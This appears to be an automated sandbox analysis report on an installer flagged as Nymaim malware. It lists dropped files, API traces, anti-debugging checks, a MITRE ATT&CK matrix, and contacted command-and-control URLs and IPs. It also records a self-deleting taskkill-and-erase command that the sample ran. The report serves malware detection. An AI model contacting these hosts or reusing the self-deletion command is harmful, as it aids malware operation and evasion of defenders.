                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00419CF0 push ecx; mov dword ptr [esp], ecx
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004311AD push esi; ret
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F4BB push ecx; ret
                Source: SplitFiles131.exe.1.drStatic PE information: section name: .ave131
                Source: initial sampleStatic PE information: section name: .text entropy: 7.2455087113234224
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Program Files (x86)\Split Files\is-HBEMJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Program Files (x86)\Split Files\SplitFiles131.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpFile created: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_iscrypt.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0042425C IsIconic,SetActiveWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_004242A4 IsIconic,SetActiveWindow,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00417660 IsIconic,GetCapture,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00417D96 IsIconic,SetWindowPos,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_shfoldr.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpDropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-HBEMJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpDropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy)Jump to dropped file
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeAPI coverage: 8.5 %
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409764 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045157C FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0048AC5C FindFirstFileA,6D2969D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_01314A1A FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.338055162.0000000001839000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0042041F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_01315B47 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_013133EF mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F789 SetUnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_01311889 SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_01314362 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_01311269 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exeCode function: 3_2_013116F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00459734 GetVersion,GetModuleHandleA,6D295550,6D295550,6D295550,AllocateAndInitializeSid,LocalFree,
                Source: SplitFiles131.exe, 00000002.00000002.338567350.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: SplitFiles131.exe, 00000002.00000002.338567350.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
                Source: SplitFiles131.exe, 00000002.00000002.338567350.000000000351F000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: GetLocaleInfoA,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exeCode function: 2_2_0040F7F3 cpuid
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00455E7C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D295CA0,SetNamedPipeHandleState,6D727180,CloseHandle,CloseHandle,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405CC0 GetVersionExA,
                Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmpCode function: 1_2_00453D18 GetUserNameA,

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3370000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.3370000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.338322825.0000000003370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.338187863.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.337441362.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Windows Management Instrumentation                		Path Interception1
                Access Token Manipulation                		2
                Masquerading                		1
                Input Capture                		1
                System Time Discovery                		Remote Services1
                Input Capture                		Exfiltration Over Other Network Medium2
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts13
                Process Injection                		1
                Disable or Modify Tools                		LSASS Memory141
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		Exfiltration Over Bluetooth2
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Native API                		Logon Script (Windows)Logon Script (Windows)1
                Access Token Manipulation                		Security Account Manager3
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                Process Injection                		NTDS11
                Application Window Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer11
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items23
                Software Packing                		DCSync3
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem26
                System Information Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 778228 Sample: file.exe Startdate: 05/01/2023 Architecture: WINDOWS Score: 100 47 45.139.105.1 CMCSUS Italy 2->47 49 85.31.46.167 CLOUDCOMPUTINGDE Germany 2->49 51 Snort IDS alert for network traffic 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus detection for URL or domain 2->55 57 5 other signatures 2->57 10 file.exe 2 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\is-6A80U.tmp, PE32 10->31 dropped 13 is-6A80U.tmp 13 30 10->13         started        process6 file7 33 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 13->33 dropped 35 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 13->35 dropped 37 C:\...\unins000.exe (copy), PE32 13->37 dropped 39 3 other files (2 malicious) 13->39 dropped 16 SplitFiles131.exe 24 13->16         started        process8 dnsIp9 41 107.182.129.235, 49685, 80 META-ASUS Reserved 16->41 43 171.22.30.106, 49686, 49687, 80 CMCSUS Germany 16->43 45 45.139.105.171, 49684, 80 CMCSUS Italy 16->45 29 C:\Users\user\AppData\...\2v3Q9V1aRpd.exe, PE32 16->29 dropped 20 2v3Q9V1aRpd.exe 16->20         started        23 cmd.exe 1 16->23         started        file10 process11 signatures12 59 Multi AV Scanner detection for dropped file 20->59 25 taskkill.exe 1 23->25         started        27 conhost.exe 23->27         started        process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Split Files\SplitFiles131.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_iscrypt.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-NO1B1.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe50%ReversingLabsWin32.Trojan.Generic

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                1.2.is-6A80U.tmp.400000.0.unpack100%AviraHEUR/AGEN.1248792Download File
                2.2.SplitFiles131.exe.10000000.5.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                0.0.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                2.2.SplitFiles131.exe.400000.0.unpack100%AviraHEUR/AGEN.1250671Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.innosetup.com/0%URL Reputationsafe
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte0%URL Reputationsafe
                http://107.182.129.235/storage/extension.php2100%URL Reputationmalware
                http://107.182.129.235/storage/extension.php0%URL Reputationsafe
                http://www.remobjects.com/?ps0%URL Reputationsafe
                http://107.182.129.235ibrary.php0%URL Reputationsafe
                http://107.182.129.235ibrary.php0%URL Reputationsafe
                http://171.22.30.106/100%URL Reputationmalware
                http://45.139.105.171/0%URL Reputationsafe
                http://www.innosetup.com0%URL Reputationsafe
                http://107.182.129.235/storage/ping.php0%URL Reputationsafe
                http://171.22.30.106/library.php100%URL Reputationmalware
                http://www.remobjects.com/?psU0%URL Reputationsafe
                http://107.182.129.235/storage/extension.phpu0%Avira URL Cloudsafe
                http://107.182.129.235/storage/extension.phpC&0%Avira URL Cloudsafe
                http://www.innosetup.comDVarFileInfo$0%Avira URL Cloudsafe
                http://171.22.30.106/library.phpT9%VirustotalBrowse
                http://107.182.129.235/storage/extension.phpr16%VirustotalBrowse
                http://107.182.129.235/storage/extension.phpr100%Avira URL Cloudmalware
                http://171.22.30.106/u100%Avira URL Cloudmalware
                http://171.22.30.106/library.phpT100%Avira URL Cloudmalware
                http://107.182.129.235/storage/ping.phpS100%Avira URL Cloudmalware
                http://www.altarsoft.com/split_files.shtml0%Avira URL Cloudsafe
                http://107.182.129.235/storage/extension.phpO0%Avira URL Cloudsafe
                http://rus.altarsoft.com/split_files.shtml0%Avira URL Cloudsafe
                http://107.182.129.235/0%Avira URL Cloudsafe
                http://171.22.30.106/n100%Avira URL Cloudmalware
                http://171.22.30.106/library.php4100%Avira URL Cloudmalware
                http://107.182.129.235/storage/extension.phpz100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixintetrue
                • URL Reputation: safe
                		unknown
                http://107.182.129.235/storage/extension.phptrue
                • URL Reputation: safe
                		unknown
                http://107.182.129.235/storage/ping.phptrue
                • URL Reputation: safe
                		unknown
                http://171.22.30.106/library.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
